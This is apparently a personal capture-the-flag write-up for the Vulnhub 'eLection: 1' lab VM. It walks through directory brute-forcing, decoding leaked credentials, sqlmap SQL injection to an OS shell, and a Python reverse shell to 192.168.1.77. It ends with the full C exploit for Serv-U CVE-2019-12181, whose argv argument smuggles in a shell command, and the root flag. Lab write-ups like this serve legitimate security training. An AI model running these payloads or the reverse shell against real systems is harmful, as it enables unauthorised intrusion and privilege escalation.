Vulnhub - ELECTION: 1
Introduction
It is an OSCP-like VM, Medium Level difficulty.
This is eLection: 1 from Vulnhub.
Ports
SSH and HTTP only; simple.
HTTP
robots.txt has four disallowed entries:
- admin
- wordpress
- user, and
- election
1 through 3 actually don’t exist, but election does. It’s a Web Based Election System from tripath. Searchsploit says there’s an SQL injection, but it’s authenticated so we’d need some creds.
I run a gobuster:
root@kali:/opt/vulnhub/election# gobuster dir -u http://192.168.1.138/election/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -x js,txt,html,php
And it turns up some interesting things, including phpMyAdmin. But I ignore that and focus on card.php. It says:
00110000 00110001 00110001 00110001 00110000 00110001 etc etc
I take it to CyberChef and run it through from binary twice - we get some creds!
user:1234 pass:Zxc123!@#
These are credentials for http://192.168.1.138/election/admin and with that we can login, capture a certain request and run sqlmap.
The request:
POST /election/admin/ajax/op_kandidat.php HTTP/1.1
Host: 192.168.1.138
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Origin: http://192.168.1.138
Connection: close
Referer: http://192.168.1.138/election/admin/kandidat.php?_
Cookie: el_listing_panitia=5; el_mass_adding=false; el_listing_siswa=5; PHPSESSID=b9a4bvmua02igmm5as9manmqs2; el_lang=en-us
aksi=fetch&id=76And sqlmap:
root@kali:/opt/vulnhub/election# sqlmap -r getcandidate --level=5 --risk=3 --os-shell -p id
This commands gets an os shell through sqlmap. We can get a normal reverse shell with a second listener and our old friend pentestmonkey:
os-shell> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.77",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We’re on the box.
www-data
So we’re on as www-data. I run linpeas, because I always do. This line catches my eye:
/var/www/html/election/admin/logs/system.log:[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
We can su love. Or SSH in. Or both; whatever.
love
Love can’t run sudo. I search for SUID binaries:
love@election:/$ find / -perm -u=s -type f 2>/dev/null
And this line stands out:
/usr/local/Serv-U/Serv-U
What is Serv-U? I’ve never heard of it. Google leads me to this writeup of CVE-2019-12181, which is a privilege escalation for Serv-U FTP Server.
The exploit code is on github but it’s pretty simple:
/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html
to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}I compile it, run it and …. root.
love@election:/tmp$ ./pe
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
opening root shell
# whoami
root
# cat root.txt
5238feefc4ffe09645d97e9ee49bc3a6Cool.